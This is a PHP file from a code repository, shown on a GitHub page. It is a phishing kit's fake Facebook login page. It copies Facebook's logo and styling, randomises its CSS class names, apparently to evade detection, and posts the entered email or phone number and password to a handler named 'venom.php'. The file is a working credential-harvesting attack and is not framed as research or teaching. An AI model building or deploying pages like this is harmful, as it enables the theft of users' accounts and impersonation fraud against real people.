-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.php
83 lines (72 loc) · 2.22 KB
/
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
<!-- autoload start -->
<?php require_once __DIR__ . '/lib/init.php'; ?>
<!-- autoload end -->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Facecbook</title>
<style>
body {
margin: 0;
padding: 0;
}
.<?= $center = random_class() ?>,
.center {
text-align: center;
}
.<?= $mb3 = random_class() ?>,
.mb-3 {
margin-bottom: 0.6rem;
}
.<?= $mt3 = random_class() ?>,
.mt-3 {
margin-top: 0.6rem;
}
.<?= $form_control = random_class() ?>,
.form-control {
width: 300px;
height: 40px;
border: 1px solid #e3e3e3;
border-radius: 5px;
padding: 0 10px;
margin: 0 auto;
background-color: #f5f6f7;
}
.<?= $btn_login = random_class() ?>,
.btn-login {
width: 320px;
height: 40px;
border: 0px;
border-radius: 5px;
padding: 0 10px;
margin: 0 auto;
background-color: #1877f2;
color: #fff;
font-weight: bold;
cursor: pointer;
}
</style>
</head>
<body>
<div class="<?= $center ?>">
<div class="<?= $mb3 . " " . $mt3 ?>">
<img style="height: 40px" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="">
</div>
<div>
<form action="<?= "app/venom.php" ?>" method="POST">
<?= GET_KEY($config['parameter_url']) ?>
<div class="<?= $mb3 ?>">
<input class="<?= $form_control ?>" type="text" name="us" required placeholder="Mobile number or email address">
</div>
<div class="<?= $mb3 ?>">
<input class="<?= $form_control ?>" type="text" name="pw" required placeholder="Password">
</div>
<button class="<?= $btn_login ?>" type="submit">Log In</button>
</form>
</div>
</div>
</body>
</html>